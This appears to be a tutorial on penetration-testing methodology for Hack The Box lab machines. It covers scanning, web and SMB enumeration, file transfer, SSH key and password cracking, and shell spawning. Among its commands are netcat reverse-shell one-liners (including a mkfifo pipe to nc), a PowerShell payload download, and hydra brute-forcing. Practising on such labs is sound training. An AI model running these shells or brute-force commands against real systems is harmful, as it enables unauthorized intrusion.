HackTheBox Methodology

WHAT IS HACK THE BOX?

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.


Many people asked me about the methodology I use to root machines on Hack The Box, so today I will explain in detail how I approach a Hack The Box machine.

PREPARATION

I create a separate directory for every single machine, so that I can save the files, tools and scripts I used in each box separately and note down the important things like passwords, hashes, custom scripts/payloads etc.

HOST FILE

echo "10.10.10.XX machinename.htb" | sudo tee -a /etc/hosts
sudo nano /etc/hosts

(Note: `sudo echo ... >> /etc/hosts` does not work, because the `>>` redirection is opened by your own unprivileged shell, not by sudo; `sudo tee -a` does the append with the needed privileges.)

Now you can use either the IP or the hostname in commands and scripts as needed.
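An added example, not from the original post: a small hosts-file helper that only appends the entry if the hostname is not already mapped, and that does the append through `sudo tee` so it works on a root-owned /etc/hosts. The optional third argument (a scratch hosts file) is an assumption introduced here so the function can be tried without touching the real file.

```shell
#!/bin/sh
# Added example (not from the original post): idempotent hosts-file helper.
# Usage: add_host_entry <ip> <hostname> [hosts_file]
# The optional third argument is an assumption introduced here so the
# function can be tried against a scratch file instead of the real /etc/hosts.
add_host_entry() {
    ip="$1"; name="$2"; file="${3:-/etc/hosts}"
    if [ -z "$ip" ] || [ -z "$name" ]; then
        echo "usage: add_host_entry <ip> <hostname> [hosts_file]" >&2
        return 2
    fi
    # Loose sanity check: reject anything that is not digits and dots
    # (an unreplaced "10.10.10.XX" placeholder is caught here too).
    case "$ip" in
        *[!0-9.]*|.*|*.|*..*)
            echo "invalid IPv4 address: $ip" >&2
            return 2 ;;
    esac
    # Skip if the hostname is already mapped. -w matches whole words only and
    # -F takes the name literally, so "box.htb" does not match "otherbox.htb".
    if grep -qwF -- "$name" "$file" 2>/dev/null; then
        echo "already present: $(grep -wF -- "$name" "$file")"
        return 0
    fi
    # 'sudo echo ... >> /etc/hosts' fails because the redirection is opened by
    # the unprivileged calling shell; tee runs under sudo and appends itself.
    if [ -w "$file" ]; then
        printf '%s\t%s\n' "$ip" "$name" >> "$file"
    else
        printf '%s\t%s\n' "$ip" "$name" | sudo tee -a "$file" >/dev/null
    fi
}
```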

INFORMATION GATHERING

● NMAP :

https://nmap.org/download.html

sudo nmap -sS -sC -sV -p- -oN nmap-result.txt 10.10.10.XX
sudo nmap -v -sU -T5 -oN nmap-UDP-result.txt 10.10.10.XX

(SYN scans (-sS) and UDP scans (-sU) need raw sockets, so run them with sudo.)
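An added example, not from the original post: two small shell functions that read the normal-format (-oN) file written by the nmap command above and list the open ports, either one per line with the service name or as a comma-separated list ready for the -p option of a follow-up scan. The nmap output embedded in `demo_nmap_output` is a constructed sample, not a real scan.

```shell
#!/bin/sh
# Added example (not from the original post): parse nmap -oN output.

# Print "port/proto service" for every port nmap reported as open.
# -oN lines look like "22/tcp   open  ssh     OpenSSH 8.2p1 ..."; the version
# column is free-form text, so only the first three fields are used.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { print $1, $3 }' "$1"
}

# Same ports as a comma-separated list, e.g. "22,80,8080", for nmap -p.
port_list() {
    open_ports "$1" | cut -d/ -f1 | tr '\n' ',' | sed 's/,$//'
}

# Constructed sample of an -oN file (not a real scan result).
demo_nmap_output() {
    cat <<'EOF'
# Nmap 7.94 scan initiated (constructed sample)
Nmap scan report for machinename.htb (10.10.10.XX)
Host is up (0.050s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http       Apache httpd 2.4.41 ((Ubuntu))
| http-title: Example
|_Requested resource was /login
443/tcp  filtered https
8080/tcp open     http-proxy
EOF
}

# Stand-alone demo: write the sample to a temp file and parse it.
demo() {
    f=$(mktemp)
    demo_nmap_output > "$f"
    open_ports "$f"
    port_list "$f"
    rm -f "$f"
}
```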

● MASSCAN :

https://github.com/robertdavidgraham/masscan

sudo masscan -p1-65535,U:1-65535 10.10.10.XX

● AUTOMATE RECON / ENUM :

You can also use these scripts to automate the enumeration and recon process.

AutoRecon : https://github.com/Tib3rius/AutoRecon
nmapAutomator : https://github.com/21y4d/nmapAutomator

WEB ENUMERATION / DIRECTORY AND FILES BRUTE-FORCING :

● NIKTO :

If port 80 or 443 is open, you can use Nikto to collect more information.

https://github.com/sullo/nikto

nikto -h https://10.10.10.XX | tee nikto.txt

● GOBUSTER :

https://github.com/OJ/gobuster

gobuster dir -u http://10.10.10.XX/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .txt,.html,.php -u http://10.10.10.XX:80/ -o gobuster.txt

● FFUF :

https://github.com/ffuf/ffuf

ffuf -u http://10.10.10.XX:80/FUZZ/script.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee ffuf.txt

● WFUZZ :

https://github.com/xmendez/wfuzz

wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404,403 -u "http://10.10.10.XX/FUZZ.txt" -t 100 | tee wfuzz.txt

Use SecLists for more wordlists: https://github.com/danielmiessler/SecLists

SERVICE ENUMERATION

● EXPLOIT DB / SEARCHSPLOIT :

https://exploit-db.com/searchsploit

sudo apt update && sudo apt -y install exploitdb
searchsploit -u
searchsploit -h

● SMB ENUMERATION :

If you're on a Windows box and port 139 or 445 is open, enumerate SMB.

nmblookup -A 10.10.10.XX
nbtscan 10.10.10.XX
smbmap -H 10.10.10.XX
smbclient -L 10.10.10.XX
nmap --script smb-os-discovery 10.10.10.XX
nmap -p445 -sV --script smb-enum-services 10.10.10.XX
nmap --script smb-enum-shares -p 139,445 10.10.10.XX
nmap --script smb-vuln* -p 139,445 10.10.10.XX
rpcclient -U "" -N 10.10.10.XX

● ENUM4LINUX :

Enumerate information from Windows and Samba systems: https://kali.org/tools/enum4linux/

enum4linux -a -o 10.10.10.XX

FILE TRANSFER IN LINUX

● PYTHON HTTP SERVER :

Python server (on your machine; port 80 needs root, hence sudo):

sudo python3 -m http.server 80
sudo python -m SimpleHTTPServer 80    (Python 2 equivalent)

Wget (on the target):

wget http://[IP]/file.txt

● NETCAT :

nc -l -p [PORT] > filename    (receiver, start this first)
nc [IP/URL] [PORT] < filename    (sender)

● BASE64 :

base64 file.txt
echo "aHR0cHM6Ly9oYWNrdHJvbmlhbi5pbgo=" | base64 -d > newfile.txt

● SCP :

To transfer a file to the other server, use the following command:

scp /filename.xyz [USER]@[IP]:/path-of-file/filename.xyz

FILE TRANSFER IN WINDOWS

● HTTP SERVER :

Local System :

sudo service apache2 start
sudo cp exploit.exe /var/www/html/

Target System :

firefox http://10.10.10.XX/filename.xyz

(or from PowerShell:)

(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.XX/exploit.exe','C:\Users\USERNAME\Desktop\filename.xyz')

● PSCP :

http://xray.rutgers.edu/~matilsky/documents/pscp.htm

pscp "C:\Users\USERNAME\Folder\file.txt" [USER]@[IP]:/root/hacktheboxfile.txt

NETCAT

● INSTALLATION :

sudo apt-get install netcat
wget http://bit.ly/netcat_exe -O nc.exe

(Note: wget's lowercase -o sets the log file; uppercase -O sets the output filename.)

● LISTEN PORT :

nc -lnvp [PORT]

● CHAT SERVER :

nc -l [PORT]    (listener)
nc [IP] [PORT]    (client)

Now, type anything and it will show on the listener's shell.

● FILE TRANSFER :

nc -l -p [PORT] > filename    (receiver, start this first)
nc [IP/URL] [PORT] < filename    (sender)

● REVERSE SHELL :

Netcat is rarely present on production systems, and even if it is, there are several versions of netcat, some of which don't support the -e option.

nc -e /bin/sh 10.10.10.XX 1337

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.XX 1337 >/tmp/f
SSH

● INSTALLATION :

sudo apt install openssh-server

● CONNECTION :

● CREATE SSH KEYS :

ssh-keygen

● PERMISSION :

chmod 644 id_rsa.pub
chmod 600 id_rsa

● SSH PASSWORD CRACKING USING KEY :

Download sshng2john.py

python /opt/JohnTheRipper/run/sshng2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

● CRACK SSH PASSWORD USING HYDRA :

hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.XX

IMPACKET

Impacket is a collection of Python classes for working with network protocols.

https://github.com/CoreSecurity/impacket

SHELL SPAWNING

python -c 'import pty; pty.spawn("/bin/bash")'
os.system('/bin/bash')    (from inside a Python shell)
/bin/sh -i
/bin/bash -i
exec "/bin/sh";    (Perl)
exec "/bin/sh"    (Ruby)
os.execute('/bin/sh')    (Lua)
:!bash    (vi)
:set shell=/bin/bash:shell    (vi)
!sh    (nmap --interactive)

Interactive tty-shell : https://github.com/cornerpirate/socat-shell
